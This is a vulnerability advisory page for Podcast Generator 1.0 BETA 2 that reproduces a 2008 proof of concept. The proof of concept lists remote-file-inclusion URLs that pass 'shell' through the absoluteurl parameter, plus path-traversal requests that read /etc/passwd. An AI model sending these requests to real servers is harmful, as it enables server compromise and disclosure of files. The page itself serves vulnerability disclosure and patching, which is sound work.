Podcast Generator - exploit.company

vendor:

Podcast Generator

by:

ANA TRYAGI

7.5

CVSS

HIGH

Remote File Inclusion/File Disclosure

CWE

Product Name: Podcast Generator

Affected Version From: 1.0 BETA 2

Affected Version To: 1.0 BETA 2

Patch Exists: YES

Related CWE: N/A

CPE: a:podcastgen:podcast_generator:1.0_beta_2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Podcast Generator <= 1.0 BETA 2 RFI / File Disclosure Remote Vulnerabilities

Podcast Generator version 1.0 BETA 2 is vulnerable to Remote File Inclusion and File Disclosure. The vulnerable files are loadparser.php, admin.php, categories.php, categories_add.php, categories_remove.php, edit.php, editdel.php, ftpfeature.php, login.php, pgRSSnews.php, showcat.php, upload.php, archive_cat.php, archive_nocat.php, recent_list.php, themes.php and download.php. An attacker can exploit these vulnerabilities to include malicious files from remote locations and disclose sensitive information from the server.

Mitigation:

Upgrade to the latest version of Podcast Generator or apply the patch provided by the vendor.

Source

Exploit-DB raw data:

### Podcast Generator <= 1.0 BETA 2 RFI / File Disclosure Remote Vulnerabilities
### http://sourceforge.net/project/showfiles.php?group_id=163847
### POC :
### I- Remote File Inclusion Vulnerabilities
### /podcastgen1.0beta2/components/xmlparser/loadparser.php?absoluteurl=shell
### /podcastgen1.0beta2/core/admin/admin.php?p=admin&absoluteurl=shell
### /podcastgen1.0beta2/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl=shell
### /podcastgen1.0beta2/core/admin/categories_add.php?absoluteurl=shell
### /podcastgen1.0beta2/core/admin/categories_remove.php?absoluteurl=shell
### /podcastgen1.0beta2/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl=shell
### /podcastgen1.0beta2/core/admin/editdel.php?p=admin&absoluteurl=shell
### /podcastgen1.0beta2/core/admin/ftpfeature.php?p=admin&absoluteurl=shell
### /podcastgen1.0beta2/core/admin/login.php?absoluteurl=shell
### /podcastgen1.0beta2/core/admin/pgRSSnews.php?absoluteurl=shell
### /podcastgen1.0beta2/core/admin/showcat.php?absoluteurl=shell
### /podcastgen1.0beta2/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl=shell
### /podcastgen1.0beta2/core/archive_cat.php?absoluteurl=shell
### /podcastgen1.0beta2/core/archive_nocat.php?absoluteurl=shell
### /podcastgen1.0beta2/core/recent_list.php?absoluteurl=shell
### II- Remote File Disclosure Vulnerabilities
### /podcastgen1.0beta2/core/themes.php?theme_path=../../../../../../../../../etc/passwd%00
### /podcastgen1.0beta2/download.php?filename=../../../../../../../../../etc/passwd
                                  @@@@@@@ ANA TRYAGI @@@@@@@

# milw0rm.com [2008-02-28]